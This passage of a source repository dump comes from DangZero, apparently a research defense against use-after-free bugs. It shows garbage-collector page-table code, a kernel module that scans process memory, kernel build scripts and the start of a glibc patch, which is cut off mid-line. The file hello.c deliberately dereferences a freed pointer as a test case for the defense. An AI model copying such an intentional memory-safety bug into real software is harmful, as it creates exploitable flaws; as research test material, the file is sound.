ASSERT0(level == PT_L2); 1123 | ASSERT0(pte_is_compressed(*pte, level)); 1124 | 1125 | if (*pte & PTE_CMS_ONEBIG) { 1126 | //LOG("+++++ CMS BIGONE %lx pte=%lx\n", partial_va, *pte); 1127 | sweep_curobj_add(partial_va, PT_NUM_ENTRIES); 1128 | if (*pte & PTE_MARKED) 1129 | sweep_curobj_marked = 1; 1130 | else if (!sweep_curobj_marked) { 1131 | /* Optimistically mark reusable (leave ONEBIG bit for rollback). 
*/ 1132 | *pte &= ~PTE_COMPRESSED; 1133 | sweep_curobj_num_cleared += PT_NUM_ENTRIES; 1134 | return true; 1135 | } 1136 | 1137 | return false; 1138 | 1139 | } else if (*pte & PTE_CMS_ALLSMALL) { 1140 | /* While this cpt has all OBJEND bits set, the first page in this cpt 1141 | * may belong to an object that was started earlier, and it may be 1142 | * marked. If it is marked we have to uncompress, because the rest of 1143 | * the pages/objects in this cpt are invalid and unmarked (and thus will 1144 | * become reusable) resulting in a mixed valid/invalid cpt. */ 1145 | 1146 | //LOG("+++++ CMS ALLSMALL %lx pte=%lx marked=%d\n", partial_va, *pte, sweep_curobj_marked); 1147 | 1148 | if (sweep_curobj_marked) { 1149 | /* TODO: uncompress to a cpt instead of full pt */ 1150 | pte_t *nextpt; 1151 | uncompress_pte(level, pte); 1152 | nextpt = (pte_t*)pt_paddr2vaddr(*pte & PTE_FRAME); 1153 | sweep_pt_rec(level - 1, nextpt, 0, PT_NUM_ENTRIES, partial_va); 1154 | 1155 | return false; 1156 | } else { 1157 | /* Batch all individual (unmarked) objects. There'd never be 1158 | * a situation where we'd have to roll back. */ 1159 | *pte = PTE_EMPTY; 1160 | sweep_curobj_add(partial_va, PT_NUM_ENTRIES); 1161 | sweep_curobj_done(); 1162 | 1163 | return true; 1164 | } 1165 | } else { 1166 | cpt_t *cpt = (cpt_t *)((*pte & PTE_FRAME_CPT) + PAGE_OFFSET); 1167 | //LOG("pte=%p *pte=%lx, cpt=%p cptt=%lu\n", pte, *pte, cpt, *pte & PTE_FRAME); 1168 | bool can_free = sweep_pt_compressed_cpt(cpt, partial_va); 1169 | if (can_free) { 1170 | cpt_free(cpt); 1171 | *pte = PTE_EMPTY; 1172 | } 1173 | return can_free; 1174 | } 1175 | } 1176 | 1177 | static bool sweep_pt_rec(enum pt_level level, pte_t *pt, 1178 | size_t idx_start, size_t idx_end, vaddr_t partial_va) 1179 | { 1180 | size_t num_free_entries = 0; 1181 | size_t i; 1182 | 1183 | for (i = idx_start; i < idx_end; i++) { 1184 | bool is_compressed; 1185 | vaddr_t va; 1186 | 1187 | is_compressed = pte_is_compressed(pt[i], level); 1188 | va = partial_va | (i << pt_level_shift(level)); 1189 | if (level == PT_L4) 1190 | va = sext(va); 1191 | 1192 | // fcg: TODO: not sure 1193 | // va vs highest_shadow 1194 | //if(va >= highest_shadow){ 1195 | // num_free_entries += idx_end - i; 1196 | // break; 1197 | //} 1198 | 1199 | if (level > PT_L1 && (pt[i] & PTE_P) && (pt[i] & PTE_ALIASSES)) { 1200 | pte_t *nextpt = (pte_t*)pt_paddr2vaddr(pt[i] & PTE_FRAME); 1201 | bool can_free = sweep_pt_rec(level - 1, nextpt, 0, PT_NUM_ENTRIES, 1202 | va); 1203 | 1204 | if (can_free) { 1205 | // pp_free_one(pt[i] & PTE_FRAME); 1206 | //LOG("freed a page on level %d\n", level); 1207 | #ifdef __TRACK_MEM_USAGE 1208 | curr_pt_count--; 1209 | #endif 1210 | free_pages((unsigned long)phys_to_virt(pt[i] & PTE_FRAME), 0); 1211 | pt[i] = PTE_EMPTY; 1212 | num_free_entries++; 1213 | } 1214 | } else if (is_compressed) { 1215 | //LOG("compressed = TRUE at level %d\n", level); 1216 | //LOG("i=%lu pt=%p &pt=%p\n", i, pt, &pt); 1217 | bool freed = sweep_pt_compressed_pte(level, &pt[i], va); 1218 | if (freed) 1219 | num_free_entries++; 1220 | } else if ((pt[i] & PTE_INVALIDATED)) { 1221 | bool is_obj_end; 1222 | 1223 | if (level > PT_L1) { 1224 | // LOG("Found invalidated pt at l%d: %lx\n", level, pt[i]); 1225 | //dumpsome(); 1226 | } 1227 | ASSERT0(level == PT_L1); 1228 | 1229 | sweep_curobj_add(va, pt_num_mapped_pages(level)); 1230 | is_obj_end = !!(pt[i] & PTE_OBJEND); 1231 | 1232 | if ((pt[i] & PTE_MARKED)) 1233 | sweep_curobj_marked = 1; 1234 | else if (!sweep_curobj_marked) { 1235 | /* Optimistically clear 
invalidated status */ 1236 | pt[i] = PTE_EMPTY; 1237 | sweep_curobj_num_cleared++; 1238 | num_free_entries++; 1239 | } 1240 | 1241 | if (is_obj_end) 1242 | sweep_curobj_done(); 1243 | } else if (!(pt[i] & PTE_P)) { 1244 | num_free_entries++; 1245 | } 1246 | 1247 | if (pt[i] & PTE_MARKED && (!is_compressed || (is_compressed && pt[i] & PTE_CMS_ONEBIG))) 1248 | pt[i] &= ~PTE_MARKED; 1249 | } 1250 | return num_free_entries == PT_NUM_ENTRIES; 1251 | } 1252 | 1253 | void build_sub_spans(void) 1254 | { 1255 | /* 1256 | loop through the freelist 1257 | whenever there is a start addr that is bigger than 1258 | the chunk start, point the bucket there 1259 | if the end addr is larger than the next chunk, alias it too 1260 | */ 1261 | 1262 | // empty freelist 1263 | if(opt_freelist == NULL || opt_freelist->items.lh_first == NULL){ 1264 | return; 1265 | } 1266 | 1267 | unsigned b = 0; 1268 | uint64_t bucket_offset = SHADOW_BASE; 1269 | uint64_t bucket_next = SHADOW_BASE+bucket_size; 1270 | struct vp_span *span; 1271 | LIST_FOREACH(span, &opt_freelist->items, freelist){ 1272 | // also check the mega span? 1273 | if((span->start < bucket_offset && span->end > bucket_offset) 1274 | || (span->start >= bucket_offset && span->start < bucket_next)){ 1275 | //if(span->start >= bucket_offset && !(span->end > highest_shadow)){ 1276 | do{ 1277 | //fprintf(stderr, "b=%u (off: %lx): %lx ~ %lx\n", b, bucket_offset, span->start, span->end); 1278 | sub_spans[b] = span; 1279 | //bucket_offset += bucket_size; 1280 | bucket_offset = bucket_next; 1281 | bucket_next += bucket_size; 1282 | b++; 1283 | } while(span->end >= bucket_offset && b < NUM_BUCKETS); 1284 | } 1285 | 1286 | if(b==NUM_BUCKETS-1 || b==NUM_BUCKETS) break; 1287 | } 1288 | } 1289 | 1290 | void gc_run(void) 1291 | { 1292 | // fprintf(stderr, "[Running Garbage Collector!]\n"); 1293 | // MARK 1294 | mark_regs(); 1295 | dangzero_mark_heap(&mark_ptr); // kmod: datasegs, stack, heap, libs 1296 | 1297 | 1298 | #if (NUM_BUCKETS > 1) 1299 | uint64_t shadow_size = highest_shadow - SHADOW_BASE; 1300 | bucket_size = (shadow_size / NUM_BUCKETS) + 0x1000; // round 1301 | 1302 | sub_spans = WM_ALLOC(sizeof(struct vp_span*) * NUM_BUCKETS); 1303 | memset(sub_spans, 0, sizeof(struct vp_span*) * NUM_BUCKETS); 1304 | build_sub_spans(); 1305 | #endif 1306 | 1307 | //fprintf(stderr, "g_freelist=%p\n", g_freelist); 1308 | //fprintf(stderr, "highest_shadow=%lx\n", highest_shadow); 1309 | //fprintf(stderr, "shadow_size=%lx\n", shadow_size); 1310 | //fprintf(stderr, "bucket_size=%lu\n", bucket_size); 1311 | //fflush(stderr); 1312 | 1313 | #ifdef __TRACK_SHADOW_SIZE 1314 | output_shadow_size(false); 1315 | #endif 1316 | 1317 | // SWEEP 1318 | sweep_all(); 1319 | 1320 | #ifdef __TRACK_SHADOW_SIZE 1321 | output_shadow_size(true); 1322 | #endif 1323 | 1324 | #if (NUM_BUCKETS > 1) 1325 | WM_FREE(sub_spans); 1326 | #endif 1327 | } 1328 | 1329 | void gc_init(void) 1330 | { 1331 | uintptr_t stack_bottom; 1332 | uintptr_t stack_ptr = get_stack_pointer(); 1333 | uintptr_t bss_ptr = (uintptr_t)&bss_seg_var; 1334 | uintptr_t data_ptr = (uintptr_t)&data_seg_var; 1335 | 1336 | // printf("gc_init: %lx %lx %lx\n", stack_ptr, bss_ptr, data_ptr); 1337 | 1338 | dangzero_find_vma_bounds(stack_ptr, &stack_bottom, &stack_top); 1339 | dangzero_find_vma_bounds(bss_ptr, &bss_start, &bss_end); 1340 | dangzero_find_vma_bounds(data_ptr, &data_start, &data_end); 1341 | 1342 | // printf("stack: %lx ~ %lx\n", stack_bottom, stack_top); 1343 | // printf("bss: %lx ~ %lx\n", bss_start, bss_end); 1344 | // 
printf("data: %lx ~ %lx\n", data_start, data_end); 1345 | } 1346 | #endif 1347 | -------------------------------------------------------------------------------- /gc.h: -------------------------------------------------------------------------------- 1 | #ifndef DANGLESS_GC_H 2 | #define DANGLESS_GC_H 3 | #include 4 | 5 | // temp 6 | uint64_t out_cpt_list_size(); 7 | 8 | enum pt_level { 9 | PT_INVALID = 0, 10 | 11 | PT_L1 = 1, 12 | PT_4K = PT_L1, 13 | 14 | PT_L2 = 2, 15 | PT_2M = PT_L2, 16 | 17 | PT_L3 = 3, 18 | PT_1G = PT_L3, 19 | 20 | PT_L4 = 4, 21 | PT_512G = PT_L4, 22 | 23 | PT_NUM_LEVELS = PT_L4 24 | }; 25 | 26 | enum { 27 | PT_BITS_PER_LEVEL = 9u, 28 | 29 | PT_NUM_ENTRIES = 1uL << PT_BITS_PER_LEVEL, 30 | }; 31 | 32 | enum { 33 | PGSHIFT = 12u, 34 | PGSIZE = 1uL << PGSHIFT 35 | }; 36 | 37 | enum pte_flags { 38 | // Flags as defined by the architecture 39 | PTE_P = 1UL << 0, // present 40 | PTE_W = 1UL << 1, // writable 41 | PTE_U = 1UL << 2, // user accessible 42 | PTE_PWT = 1UL << 3, // write-through 43 | PTE_PCD = 1UL << 4, // cache-disable 44 | PTE_A = 1UL << 5, // accessed 45 | PTE_D = 1UL << 6, // dirty 46 | PTE_PS = 1UL << 7, // page-size (in L2/L3) 47 | PTE_G = 1UL << 8, // global 48 | // bits 9..11 ignored 49 | // bits 12..51 page frame/reserved 50 | // bits 52..62 ignored 51 | PTE_NX = 1UL << 63, // non-executable 52 | 53 | // Flags used by dangless (should be ignored bits in arch, although most are 54 | // only set on non-present PTEs generally) 55 | PTE_ALIASSES = 1UL << 8, // child levels are aliasses (>L1, !PS) 56 | PTE_INVALIDATED = 1UL << 9, // invalidated alias (L1..L4) 57 | PTE_OBJEND = 1UL << 10, // object ends at this page (L1) 58 | PTE_MARKED = 1UL << 62, // marked (GC) (L1..L4) 59 | 60 | // Entries pointing to compressed page tables have some more constraints, only 61 | // the lower 6 bits are not used for the cpt pointer. Only valid if !PTE_P. 62 | PTE_COMPRESSED = 1UL << 1, // points to compressed L1PT (2bit cpt) (L2) 63 | PTE_CMS_ONEBIG = 1UL << 3, // cpt consists of 1 obj (no cptp) 64 | PTE_CMS_ALLSMALL = 1UL << 4, // cpt consists of all 4K objs (no cptp) 65 | }; 66 | 67 | enum { 68 | PTE_EMPTY = 0, 69 | }; 70 | 71 | enum { 72 | PTE_FRAME_CPT = 0x000fffffffffffc0UL, 73 | 74 | PTE_FRAME = 0x000ffffffffff000UL, 75 | PTE_FRAME_4K = PTE_FRAME, 76 | PTE_FRAME_L1 = PTE_FRAME_4K, 77 | 78 | PTE_FRAME_2M = 0x000fffffffe00000UL, 79 | PTE_FRAME_L2 = PTE_FRAME_2M, 80 | 81 | PTE_FRAME_1G = 0x000fffffc0000000UL, 82 | PTE_FRAME_L3 = PTE_FRAME_1G, 83 | 84 | }; 85 | 86 | typedef void cpt_t; /* Disallow derefs without explicit cast. 
*/ 87 | enum compression_type { 88 | COMPRESSION_NONE = 0, 89 | COMPRESSION_NORMAL = 1, 90 | COMPRESSION_ONEBIG = 2, 91 | COMPRESSION_ALLSMALL = 3, 92 | }; 93 | 94 | enum cpt_field { 95 | CPT_OBJEND = 0UL, 96 | CPT_INVALIDATED = 1UL, 97 | 98 | CPT_NUM_FIELDS = 2UL 99 | }; 100 | 101 | #define CPT_SIZE_BITS (PT_NUM_ENTRIES * CPT_NUM_FIELDS) 102 | #define CPT_SIZE_BYTES (CPT_SIZE_BITS / 8) 103 | 104 | #define CPT_SLAB_PAGES (1) 105 | #define CPT_SLAB_SIZE (CPT_SLAB_PAGES * PGSIZE) 106 | 107 | typedef int8_t i8; 108 | typedef uint8_t u8; 109 | typedef int16_t i16; 110 | typedef uint16_t u16; 111 | typedef int32_t i32; 112 | typedef uint32_t u32; 113 | typedef int64_t i64; 114 | typedef uint64_t u64; 115 | typedef u64 pte_t; 116 | typedef uintptr_t paddr_t; 117 | typedef uintptr_t vaddr_t; 118 | 119 | #define PG_OFFSET(BASE, NPAGES) \ 120 | ((typeof((BASE)))((uintptr_t)(BASE) + (NPAGES) * PGSIZE)) 121 | 122 | #define FLAG_ISSET(BITSET, BIT) ((bool)((BITSET) & (BIT))) 123 | 124 | typedef int (*proto_dangzero_find_vma_bounds)(uintptr_t ptr, uintptr_t* start, uintptr_t* end); 125 | proto_dangzero_find_vma_bounds dangzero_find_vma_bounds; 126 | typedef void (*proto_dangzero_mark_heap)(void* func_mark_ptr); 127 | proto_dangzero_mark_heap dangzero_mark_heap; 128 | 129 | static inline bool pte_is_compressed(pte_t pte, enum pt_level level) 130 | { 131 | return level == PT_L2 && !(pte & PTE_P) && (pte & PTE_COMPRESSED); 132 | } 133 | 134 | void cpt_nuke(void); 135 | void cpt_destruct(void); 136 | pte_t* uncompress_pte(enum pt_level level, pte_t *pte); 137 | void try_collect_pt(vaddr_t va, size_t npages); 138 | void try_compress_pt(vaddr_t va, size_t npages); 139 | void gc_run(void); 140 | void gc_init(void); 141 | 142 | #endif 143 | -------------------------------------------------------------------------------- /hello.c: -------------------------------------------------------------------------------- 1 | #include <stdio.h> 2 | #include <stdlib.h> 3 | 4 | int main(){ 5 | int* ptr = malloc(sizeof(int) * 4); 6 | printf("mem obj @ %p\n", ptr); 7 | free(ptr); 8 | /* use-after-free */ 9 | *ptr = 1; 10 | 11 | printf("this should not be reached\n"); 12 | return 0; 13 | } 14 | -------------------------------------------------------------------------------- /kml-image/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM ubuntu:14.04 2 | ARG DEBIAN_FRONTEND=noninteractive 3 | RUN apt update 4 | RUN apt install -y build-essential libncurses-dev bison flex libelf-dev libssl-dev bc wget 5 | RUN mkdir -p /home/kml 6 | WORKDIR /home/kml 7 | RUN wget -O kernel.gz download.vusec.net/dataset/kml-kernel.tar.gz 8 | RUN tar -xf kernel.gz 9 | WORKDIR /home/kml/linux-4.0 10 | RUN make -j`nproc` deb-pkg 11 | -------------------------------------------------------------------------------- /kml-image/build_kml.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | docker build -t kml .
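# The docker build above compiles the KML kernel inside the image (the
# Dockerfile runs make deb-pkg in /home/kml/linux-4.0). The commands below
# create a throwaway container from that image, copy the resulting Debian
# packages and bzImage out to the host, and remove the container again.
# The .deb names embed the package version produced by the build (4.0.0-kml-6
# here); if the docker cp commands fail, list the build artifacts first to
# check the names, e.g.:
#   docker run --rm kml ls /home/kml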
3 | docker container create --name buildkml kml 4 | docker cp buildkml:/home/kml/linux-firmware-image-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 5 | docker cp buildkml:/home/kml/linux-headers-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 6 | docker cp buildkml:/home/kml/linux-image-4.0.0-kml-dbg_4.0.0-kml-6_amd64.deb ./ 7 | docker cp buildkml:/home/kml/linux-image-4.0.0-kml_4.0.0-kml-6_amd64.deb ./ 8 | docker cp buildkml:/home/kml/linux-libc-dev_4.0.0-kml-6_amd64.deb ./ 9 | docker cp buildkml:/home/kml/linux-4.0/arch/x86/boot/bzImage ./ 10 | docker container rm -f buildkml 11 | 12 | -------------------------------------------------------------------------------- /kmod/Makefile: -------------------------------------------------------------------------------- 1 | obj-m += dangmod.o 2 | 3 | all: 4 | make -C /lib/modules/4.0.0-kml/build M=$(PWD) modules 5 | 6 | clean: 7 | make -C /lib/modules/4.0.0-kml/build M=$(PWD) clean 8 | -------------------------------------------------------------------------------- /kmod/dangmod.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | #include // for ? 6 | #include // for current 7 | #include // for file name 8 | #include 9 | #include 10 | #include 11 | 12 | MODULE_LICENSE("GPL"); 13 | MODULE_AUTHOR("fcg"); 14 | MODULE_DESCRIPTION("DangZero kmod"); 15 | MODULE_VERSION("0.1"); 16 | 17 | typedef int (*proto_mark_ptr)(uintptr_t ptr); 18 | proto_mark_ptr mark_ptr; 19 | 20 | // cat /proc/kallsyms | grep "test_func" 21 | 22 | // page table indexing 23 | #define _PAGE_MASK 0x000ffffffffff000UL 24 | #define PAGE_MASK_INDEX 0x1FF // 511 25 | #define MAX_PAGE_INDEX 511 26 | #define PML4_INDEX(x) ((x >> 39) & PAGE_MASK_INDEX) 27 | #define PDPT_INDEX(x) ((x >> 30) & PAGE_MASK_INDEX) 28 | #define PDE_INDEX(x) ((x >> 21) & PAGE_MASK_INDEX) 29 | #define PTE_INDEX(x) ((x >> 12) & PAGE_MASK_INDEX) 30 | 31 | //typedef uint64_t phys_addr_t; 32 | #define SHADOW_BASE 0xffff960000000000 33 | #define SHADOW_END 0xffffc87fffffffff 34 | 35 | // arch/x86/include/asm/pgtable_types.h 36 | #define PAGE_PRESENT 1 37 | 38 | // array option (waste space, faster than list) 39 | struct map_pa_va { 40 | uintptr_t pa; 41 | uintptr_t va; 42 | }; 43 | 44 | static inline bool is_potential_ptr(uintptr_t v) 45 | { 46 | return SHADOW_BASE <= v && v <= SHADOW_END; 47 | } 48 | 49 | static uintptr_t* get_table_page(uintptr_t* table, unsigned short index) 50 | { 51 | uintptr_t page = *(table+index); 52 | if(!(page & PAGE_PRESENT)) 53 | return NULL; 54 | 55 | return (uintptr_t*)((page & _PAGE_MASK) + PAGE_OFFSET); 56 | } 57 | 58 | phys_addr_t get_phys_addr_user(uintptr_t addr, uintptr_t* cr3) 59 | { 60 | uintptr_t* page = cr3; 61 | phys_addr_t phys_page; 62 | unsigned short index; 63 | 64 | // level 4 65 | index = PML4_INDEX(addr); 66 | page = get_table_page(page, index); 67 | if(page == NULL) return 0; 68 | 69 | // level 3 70 | index = PDPT_INDEX(addr); 71 | page = get_table_page(page, index); 72 | if(page == NULL) return 0; 73 | 74 | // level 2 75 | index = PDE_INDEX(addr); 76 | page = get_table_page(page, index); 77 | if(page == NULL) return 0; 78 | 79 | // phys page 80 | index = PTE_INDEX(addr); 81 | phys_page = *(page+index); 82 | if(!(phys_page & PAGE_PRESENT)) return 0; 83 | 84 | return phys_page; 85 | } 86 | 87 | 88 | 89 | int dangzero_find_vma_bounds(uintptr_t ptr, uintptr_t* start, uintptr_t* end) 90 | { 91 | struct vm_area_struct *vma = 0; 92 | if(current->mm && current->mm->mmap){ 93 | for(vma = current->mm->mmap; vma; vma = 
vma->vm_next){ 94 | if(vma->vm_start <= ptr && ptr < vma->vm_end){ 95 | *start = vma->vm_start; 96 | if(stack_guard_page_start(vma, *start)) 97 | *start += PAGE_SIZE; 98 | *end = vma->vm_end; 99 | if(stack_guard_page_end(vma, *end)) 100 | *end -= PAGE_SIZE; 101 | return 1; 102 | } 103 | } 104 | } 105 | return 0; 106 | } 107 | 108 | bool gc_skip_vma(struct vm_area_struct* vma) 109 | { 110 | /* if(vma->vm_start <= vma->vm_mm->brk && 111 | vma->vm_end >= vma->vm_mm->start_brk){ 112 | return false; 113 | } 114 | // if(vma->vm_flags & VM_GROWSDOWN){ 115 | // return false; 116 | // } 117 | return true;*/ 118 | 119 | char *buf, *p; 120 | struct file *file = vma->vm_file; 121 | // vdso 122 | if(!vma->vm_mm){ 123 | return true; 124 | } 125 | 126 | if(file){ 127 | // read-only executable file 128 | if(!(vma->vm_flags & VM_WRITE) && (vma->vm_flags & VM_EXEC)){ 129 | return true; 130 | } 131 | // lazy loaded file 132 | else if(!(vma->vm_flags & (VM_READ | VM_WRITE | VM_EXEC))){ 133 | return true; 134 | } 135 | /* 136 | buf = kmalloc(256, GFP_KERNEL); 137 | p = d_path(&file->f_path, buf, 256); 138 | if(strstr(p, ".so")){ 139 | //printk("skip vma: %s\n", p); 140 | kfree(buf); 141 | return true; 142 | } 143 | kfree(buf);*/ 144 | } 145 | 146 | return false; 147 | } 148 | 149 | bool fork_skip_vma(struct vm_area_struct* vma) 150 | { 151 | /* 152 | // option test: [heap] only 153 | if(vma->vm_start <= vma->vm_mm->brk && 154 | vma->vm_end >= vma->vm_mm->start_brk){ 155 | return false; 156 | } 157 | return true; // all that are not heap 158 | */ 159 | 160 | // vdso 161 | if(!vma->vm_mm){ 162 | return true; 163 | } 164 | // stack 165 | else if(vma->vm_flags & VM_GROWSDOWN){ 166 | return true; 167 | } 168 | // file maps 169 | else if(vma->vm_file){ 170 | // read-only executable file 171 | if(!(vma->vm_flags & VM_WRITE) && (vma->vm_flags & VM_EXEC)){ 172 | return true; 173 | } 174 | // lazy loaded file 175 | else if(!(vma->vm_flags & (VM_READ | VM_WRITE | VM_EXEC))){ 176 | return true; 177 | } 178 | } 179 | 180 | return false; 181 | } 182 | 183 | void dangzero_mark_heap(void* func_mark_ptr) 184 | { 185 | struct vm_area_struct *vma; 186 | uintptr_t *data; 187 | ssize_t i; 188 | unsigned long start, end; 189 | mark_ptr = (proto_mark_ptr)func_mark_ptr; 190 | 191 | if(current->mm && current->mm->mmap){ 192 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 193 | if(!gc_skip_vma(vma)){ 194 | 195 | // make sure we dont access guard pages (segfault) 196 | start = vma->vm_start; 197 | if(stack_guard_page_start(vma, start)) 198 | start += PAGE_SIZE; 199 | end = vma->vm_end; 200 | if(stack_guard_page_end(vma, end)) 201 | end -= PAGE_SIZE; 202 | 203 | data = (uintptr_t*) start; 204 | 205 | for(i = 0; i < (end-start)/sizeof(void*); i++){ 206 | if (is_potential_ptr(data[i])){ 207 | mark_ptr(data[i]); 208 | } 209 | } 210 | } 211 | } 212 | } 213 | } 214 | 215 | 216 | struct map_pa_va* dangzero_create_fork_map(uintptr_t* cr3, size_t* num_addrs_ret) 217 | { 218 | struct vm_area_struct *vma = 0; 219 | uintptr_t vpage; 220 | size_t num_pages=0; 221 | size_t num_addrs=0; 222 | 223 | // init struct 224 | struct map_pa_va* addr_map = NULL; 225 | 226 | if(current->mm && current->mm->mmap){ 227 | //printk("current user app: %s\n", current->comm); 228 | 229 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 230 | if(!fork_skip_vma(vma)){ 231 | num_pages += (vma->vm_end - vma->vm_start) / PAGE_SIZE; 232 | } 233 | } 234 | 235 | // kmalloc max size is 4MB 236 | // sizeof(struct map_pa_va) == 16 bytes 237 | // max kmalloc can fit 
250 000 structs (pages) 238 | // which is 1 GB of mapped memory 239 | 240 | addr_map = kmalloc(sizeof(struct map_pa_va) * num_pages, GFP_KERNEL); 241 | if(addr_map == NULL){ 242 | return NULL; 243 | } 244 | 245 | for(vma = current->mm->mmap; vma; vma = vma->vm_next){ 246 | if(!fork_skip_vma(vma)){ 247 | //printk("%08lx-%08lx\n", vma->vm_start, vma->vm_end); 248 | for(vpage = vma->vm_start; vpage < vma->vm_end; vpage+=PAGE_SIZE){ 249 | phys_addr_t pa = get_phys_addr_user(vpage, cr3); 250 | if(pa != 0){ 251 | //printk("VA %p -> PA %p\n", (void*)vpage, (void*)(pa & PAGE_MASK)); 252 | addr_map[num_addrs].va = vpage; 253 | addr_map[num_addrs].pa = pa & _PAGE_MASK; 254 | num_addrs++; 255 | } 256 | } 257 | } 258 | } 259 | } 260 | 261 | //printk("Result ptr=%p, size addrs=%lu\n", addr_map, num_addrs); 262 | 263 | *num_addrs_ret = num_addrs; 264 | return addr_map; 265 | } 266 | 267 | 268 | 269 | static int __init kmod_init(void) { 270 | printk(KERN_INFO "Init DangZero Kmod.\n"); 271 | return 0; 272 | } 273 | 274 | static void __exit kmod_exit(void) { 275 | printk(KERN_INFO "Exit DangZero Kmod.\n"); 276 | } 277 | 278 | module_init(kmod_init); 279 | module_exit(kmod_exit); 280 | -------------------------------------------------------------------------------- /patchglibc.diff: -------------------------------------------------------------------------------- 1 | diff -urN glibc-2.31_base/elf/dl-map-segments.h glibc-2.31_pre_tls/elf/dl-map-segments.h 2 | --- glibc-2.31_base/elf/dl-map-segments.h 2020-02-01 12:52:50.000000000 +0100 3 | +++ glibc-2.31_pre_tls/elf/dl-map-segments.h 2022-01-28 16:05:45.024133923 +0100 4 | @@ -70,10 +70,14 @@ 5 | unallocated. Then jump into the normal segment-mapping loop to 6 | handle the portion of the segment past the end of the file 7 | mapping. */ 8 | - if (__glibc_unlikely 9 | - (__mprotect ((caddr_t) (l->l_addr + c->mapend), 10 | + // if (__glibc_unlikely 11 | + // (__mprotect ((caddr_t) (l->l_addr + c->mapend), 12 | + // loadcmds[nloadcmds - 1].mapstart - c->mapend, 13 | + // PROT_NONE) < 0)) 14 | +if(__glibc_unlikely(PRE_TLS_INTERNAL_SYSCALL(mprotect, , 3, (caddr_t) (l->l_addr + c->mapend), 15 | loadcmds[nloadcmds - 1].mapstart - c->mapend, 16 | PROT_NONE) < 0)) 17 | + 18 | return DL_MAP_SEGMENTS_ERROR_MPROTECT; 19 | } 20 | 21 | diff -urN glibc-2.31_base/elf/setup-vdso.h glibc-2.31_pre_tls/elf/setup-vdso.h 22 | --- glibc-2.31_base/elf/setup-vdso.h 2020-02-01 12:52:50.000000000 +0100 23 | +++ glibc-2.31_pre_tls/elf/setup-vdso.h 2022-01-25 14:02:10.000000000 +0100 24 | @@ -113,8 +113,10 @@ 25 | /* We have a prelinked DSO preloaded by the system. 
*/ 26 | GLRO(dl_sysinfo_map) = l; 27 | # ifdef NEED_DL_SYSINFO 28 | +#ifndef __x86_64__ 29 | if (GLRO(dl_sysinfo) == DL_SYSINFO_DEFAULT) 30 | GLRO(dl_sysinfo) = GLRO(dl_sysinfo_dso)->e_entry + l->l_addr; 31 | +#endif 32 | # endif 33 | } 34 | #endif 35 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/access.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/access.c 36 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/access.c 2020-02-01 12:52:50.000000000 +0100 37 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/access.c 2022-01-26 20:44:08.522638460 +0100 38 | @@ -24,7 +24,8 @@ 39 | __access (const char *file, int type) 40 | { 41 | #ifdef __NR_access 42 | - return INLINE_SYSCALL_CALL (access, file, type); 43 | + return PRE_TLS_INLINE_SYSCALL (access, 2, file, type); 44 | + //return INLINE_SYSCALL_CALL (access, file, type); 45 | #else 46 | return INLINE_SYSCALL_CALL (faccessat, AT_FDCWD, file, type); 47 | #endif 48 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/close_nocancel.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/close_nocancel.c 49 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/close_nocancel.c 2020-02-01 12:52:50.000000000 +0100 50 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/close_nocancel.c 2022-01-26 20:45:26.306502151 +0100 51 | @@ -23,6 +23,7 @@ 52 | int 53 | __close_nocancel (int fd) 54 | { 55 | - return INLINE_SYSCALL_CALL (close, fd); 56 | + return PRE_TLS_INLINE_SYSCALL (close, 1, fd); 57 | + //return INLINE_SYSCALL_CALL (close, fd); 58 | } 59 | libc_hidden_def (__close_nocancel) 60 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/dl-writev.h glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/dl-writev.h 61 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/dl-writev.h 2020-02-01 12:52:50.000000000 +0100 62 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/dl-writev.h 2022-01-26 20:47:28.969293412 +0100 63 | @@ -34,5 +34,6 @@ 64 | _dl_writev (int fd, const struct iovec *iov, size_t niov) 65 | { 66 | INTERNAL_SYSCALL_DECL (err); 67 | - INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 68 | + PRE_TLS_INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 69 | + //INTERNAL_SYSCALL (writev, err, 3, fd, iov, niov); 70 | } 71 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/_exit.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/_exit.c 72 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/_exit.c 2020-02-01 12:52:50.000000000 +0100 73 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/_exit.c 2022-01-26 20:48:19.062210090 +0100 74 | @@ -28,7 +28,8 @@ 75 | while (1) 76 | { 77 | #ifdef __NR_exit_group 78 | - INLINE_SYSCALL (exit_group, 1, status); 79 | + PRE_TLS_INLINE_SYSCALL (exit_group, 1, status); 80 | + //INLINE_SYSCALL (exit_group, 1, status); 81 | #endif 82 | INLINE_SYSCALL (exit, 1, status); 83 | 84 | diff -urN glibc-2.31_base/sysdeps/unix/sysv/linux/mmap64.c glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/mmap64.c 85 | --- glibc-2.31_base/sysdeps/unix/sysv/linux/mmap64.c 2020-02-01 12:52:50.000000000 +0100 86 | +++ glibc-2.31_pre_tls/sysdeps/unix/sysv/linux/mmap64.c 2022-01-26 21:32:11.573026694 +0100 87 | @@ -56,7 +56,8 @@ 88 | return (void *) MMAP_CALL (mmap2, addr, len, prot, flags, fd, 89 | (off_t) (offset / MMAP2_PAGE_UNIT)); 90 | #else 91 | - return (void *) MMAP_CALL (mmap, addr, len, prot, flags, fd, offset); 92 | + return (void *) 